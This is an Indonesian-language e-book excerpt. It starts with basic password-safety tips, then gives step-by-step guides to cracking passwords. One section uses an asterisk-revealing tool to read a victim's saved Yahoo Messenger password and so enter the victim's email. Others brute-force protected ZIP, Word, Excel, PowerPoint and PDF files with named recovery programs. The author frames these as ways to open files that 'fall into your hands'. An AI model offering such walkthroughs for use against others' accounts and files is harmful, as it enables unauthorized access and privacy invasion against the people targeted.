Sebelum saya membahas tehnik menjebol password, ada baiknya saya memberitahu
anda TIPS Cara Membuat Password yang 99,9 % Aman. Lho..... Kenapa tidak 100 %
Aman ?
Karena Memang SAYA TIDAK BERANI MENJAMIN Bahwa Tips Berikut ini akan
Menjamin Keamanan Password Anda tidak akan bisa dijebol.
Mengapa ?
KARENA YANG NAMANYA MALING Tuh akan jauh lebih pintar daripada
pembuat alat keamanan.
Buktinya Mobil yang telah dilengkapi ALARM dan DITARUH di GARASI pun
masih bisa dicuri Maling,
Bahkan saya juga pernah mendengar ada Mobil Yang diparkir di sebuah Mall tibatiba
raib entah kemana, padahal diparkir di dekat pos keamanan .... Aneh bin ajaib
bukan ?
Karena itu jangan jadikan TIPS BERIKUT INI sebagai SEBUAH KEPASTIAN, tapi
jadikan TIPS Berikut ini akan MEMPERSULIT, ingat .. MEMPERSULIT MALING
MENJEBOL PASSWORD ANDA.
Baiklah, berikut ini tips nya :
1. Buatlah password yang TIDAK BERHUBUNGAN DENGAN DIRI ANDA,
misal nama orangtua, nama anak, kekasih, tanggal lahir, tanggal jadian, hari
perkawinan, no.ktp, dan sebagainya. Terutama bagi anak SMA yang
mengunakan FRIENDSTER, Jangan gunakan data apapun yang kalian INPUT
di FRIENDSTER Kalian sebagai PASSWORD. Hal ini bagaikan anda
memberikan Kunci Motor / Mobil secara gratis kepada Maling, hehehe ...
2. Buatlah jumlah karakter yang panjang, lebih baik lebih dari 15 karakter
3. Jangan gunakan password yang bersumber dari Kamus
4. Hati-hati apabila anda membuat password dari Komputer Publik, misalnya di
Warnet, Kantor, dsb, karena bisa saja ada program Keylogger (Pembaca dan
penyimpan setiap ketukan Keyboard anda)
5. Buatlah password dengan karakter unik, diluar angka dan huruf, misal &#*^{}
6. Jangan menyimpan password dalam Handphone anda, karena bila HP Anda
dicuri orang, maka lenyaplah semua data dan barang berharga anda.
Demikian Tips dari saya, semoga Bermanfaat.
Mari kita lanjutkan ....
http://www.sangatrahasia.com
Rahasia Menjebol Password YM
Siapa yang tidak mengenal Yahoo Messenger ?
Yahoo Messenger adalah salah satu aplikasi atau service yang diberikan oleh Yahoo
agar kita bisa chatting dengan siapaun diseluruh penjuru dunia, baik via tulisan
maupun voice.
Anda harus memiliki email Yahoo terlebih dahulu untuk memanfaatkan service ini.
Biasanya dalam form.login YM, dibawahnya ada tulisan REMEMBER MY ID dan
PASSWORD, yang SECARA TIDAK SENGAJA TERCENTANG, sehingga ketika
Si Pemilik ID logout, data Login dan passwordnya masih tersimpan, walalupun data
passwordnya MASIH BERBENTUK ASTERIX / BINTANG ( ****** )
Nah data yang masih berbentuk Asterix ini bisa dijebol dengan tools yang bernama
Snadsboy’s Revelation V2.
Mungkin sampai disini ada sebagian anda yang bertanya ....
Ngapain sich susah-susah menjebol Password Yahoo Messenger ?
Nah disinilah kesalahan anda.
Tujuan kita menjebol password Asterix adalah agar KITA BISA MENGAKSES
EMAIL YAHOO Korban, Bukan YAHOO MESSENGERNYA
Jadi bagaimana kita bisa mengakses Email Yahoo Korban, jika password yang masih
berbentuk Asterix belum kita pecahkan ?
Ok, mari kita lanjutkan ...
Begini cara menjalankan aplikasi Snadsboy’s Revelation V2 :
1. Instal terlebih dahulu aplikasi ini, http://www.snadboy.com pada komputer
anda
2. Jalankan program ini dengan memilih menu START -> ALL PROGRAMS -
> SNADBOY’S REVELATION V2 -> REVELATION
3. Anda akan melihat TANDA PLUS DALAM LINGKARAN Software ini.
4. Aktifkan Snadsboy’s Revelation V2, klik tanda plus dalam lingkaran
kemudian DRAG ke AREA PASSWORD yang masih berbentuk Asterix
di YM Korban, TAHAN BEBERAPA SAAT, sehingga password akan
ditampilkan pada TEXTBOX berbentuk TEXT.
5. Sekarang anda bisa membaca password Yahoo Korban, SANGAT
MUDAH BUKAN ?


Rahasia Menjebol Password Winzip
Winzip adalah alat yang digunakan untuk mengkompresi file yang berukuran
besar sehingga bisa dikurangi kapasitasnya, biasanya file akan berakhiran DOT
ZIP (.zip)
Winzip juga memberikan fasilitas proteksi password apabila data pada file
tersebut dianggap penting dan sangat rahasia.
Tapi jangan kuatir ..... Karena anda berkenan membeli e-book ini, maka saya akan
ajarkan TEHNIK MENJEBOL File yang diproteksi PASSWORD WINZIP.
1. Bukalah http://www.astonsoft.com
2. Downloadlah file ZIP PASSWORD FINDER , EKSTRAKLAH TERLEBIH
DAHULU
3. Setelah diekstrak, installah di komputer
4. Lalu jalankan (RUN) Program tersebut
5. Klik TOMBOL OPEN FILE
6. Pilih file ZIP yang akan dijebol passwordnya, kemudian Klik OPEN kembali
7. Setelah filenya terpilih, pada OPSI CHAR TYPE PROPERTY, klik
ALPHA (lower) (a-z), lalu untuk MAX PASSWORD LENGTH : 5
8. Lalu KLIK TOMBOL START
9. Klik Tombol DISPLAY ON
10. Proses akan memakan waktu yang cukup lama kira-kira 25 menit
11. Jreng .. Jreng .... setelah bosan menunggu, akhirnya KELUARLAH
PASSWORD ZIP tersebut !!!

Rahasia Menjebol Password Microsoft Word
Hehehe ... saya 99,9 % yakin, jangankan cara menjebol password Microsoft Word,
cara memberi password pada dokumen Microsoft Word pun anda pasti belum tahu
.....
Maaf .... jangan tersinggung , anda tidak sendirian kok, dulunya saya juga begitu
...dan hanya segelintir orang saja yang mengetahui rahasia ini, makanya website
ini saya namakan http://www.sangatrahasia.com karena memuat informasi –
informasi rahasia yang berharga dan berkategori SANGAT RAHASIA
Ok, langsung saja ya ...
1. Bukalah : http://www.freewordexcelpassword.com
2. Download programnya
3. Instal programnya
4. Klik tombol NEXT, lalu KLIK TAB SELECT FILE -> Lalu klik tombol
Select a file
5. Pada kotak dialog SELECT WORD or EXCEL FILE, pilih WORD files
(*.doc) pada OPSI “File of type” di bagian paling bawah
6. Lalu Klik OPEN
7. Setelah anda menentukan file WORD yang akan dibuka, selanjutnya Anda
Klik Tab “BRUTE FORCE RECOVERY”
8. Pada “BRUTE FORCE RECOVERY” anda harus menentukan character yang
mungkin diinputkan , isilah dengan a-z, A-Z, 0-9, special character
9. Lalu inputkan From (length)nya misal pilihlah 1 to 9
10. Klik GO / NEXT
11. Nah, tinggal ditunggu deh, prosesnya juga cukup lama, anda tinggal saja dulu
sambil nonton tv atau lihat website lainnya di Internet ....
12. Jika proses ini berhasil, maka akan muncul KOTAK INFO : Excel File
Password Recovery. Lho kok Excel File password, saya kan nyarinya Word
File Pasword ? Tenang ... Kotak Info ini memamng namanya Excel File
Password Recovery kok ... tapi tetep itu adalah word file password isinya.
Ok, SANGAT MUDAH BUKAN ? Kita langsung lanjutkan ya ...

Rahasia Menjebol Password Microsoft Excel
1. Bukalah : http://www.passwordrecoverytools.com
2. Installah program Accent EXCEL Password Recovery (AEXPR) terlebih
dahulu di komputer anda
3. Klik OPEN a Document
4. Pada kotak dialog , carilah File Excel yang diproteksi password, lalu KLIK
OPEN
5. Jika sudah Klik Lambang START ?
6. Selanjutnya akan tampil kotak dialog Accent Password Recovery Wizard,
anda pilih Opsi kedua yaitu : No (Brute-force attack will be performed)
7. Klik Next
8. Lalu pilih Opsi Create Custom Charset
9. Klik Next
10. Lalu anda pilih No (Simple brute force attack will be performed)
11. Klik Next
12. Lalu beri tanda checklist pada pilihan Users
13. Klik Next
14. Anda akan tiba di Penentuan Length / Panjang Password, aturlah : Password
Length : 1 dan start search with : a
15. Klik Next, lalu KLIK RUN SEARCH
16. Wuiihhh, setelah langkah yang panjang dan melelahkan ini, anda pun harus
diwajibkan menunggu cukup lama
17. Akhirnya terbukalah password yang didamba-dambakan ... (Halaaah .... apaan
seh)
Rahasia Menjebol Password Microsoft Power Point
1. Bukalah : http://www.intelore.com/password-recovery.php
2. Installah program Password Recovery for MS. Power Point
3. Pilih File -> Open
4. Pilih file yang akan dijebol
5. Klik Open
6. Klik Tombol Next
7. Berikutnya anda akan menemukan kotak Password Information , attack
methods, PILIH : I do not know anything about the password
8. Klik Next
9. Berikutnya anda akan menemukan kotak Select Main Attack Profile , PILIH :
Automatic Attack Profile (recommended)
10. Klik Next
11. Klik Finish
12. Jika anda mengira saya akan menuliskan : “silahkan anda menonton tv,
sebab diperlukan waktu yang lama untuk menunggu “ , hehehe anda salah
besar, karena kali ini ... untuk menjebol password MS POWER POINT anda
hanya menunggu SEBENTAR SAJA KOK, huhehehe
13. Akhirnya Password pujaan hati pun muncul tanpa malu-malu , huehehe ...

Rahasia Menjebol Password PDF
Siapa yang tidak mengenal PDF ?
Anda belum kenal PDF ? Kenalan dulu dunk ... huhehehe
Kalau anda penggemar E-Book, maka anda sudah pasti tahu apa PDF itu ?
Ok langsung saja ya, sebab masih bayak yang perlu saya bahas dibelakang
1. Bukalah : http://www.elcomsoft.com/apdfpr.html
2. Instal program Advanced PDF Password Recovery
3. Jalankan di komputer anda
4. Pada TAB RANGE berilah tanda checklist pada pilihan ALL PRINTABLE
5. Lalu pada Tab Length isilah : Minimal Password Length : 1 character(s) dan
Maximal password length : 4 character(s)
6. Pilih type of attack: Brute-force
7. Pilih FILE -> Open File
8. Pilihlah File yang diproteksi password, lalu klik tombol OPEN
9. Lalu Klik START RECOVERY
10. Tunggulah sebentar, maka password pun akan muncul dari tempat
persembunyiannya, hwhehehe... Very Happy
Nah, sangat mudah bukan ? Kini tidak ada lagi file-file yang aman baik itu MS
WORD, EXCEL, POWER POINT Ataupun PDF jika jatuh ke tangan anda.
Malah jika anda sudah mahir, anda bisa buka jasa PENJEBOLAN PASSWORD
PENTING karena PEMILIKNYA LUPA PASSWORD. Mintalah harga yang mahal
kepada sang pemilik, ingat Ilmu ini sangatlah berharga dan tidak banyak orang yang
tahu ...

semoga bermanfaat ya..............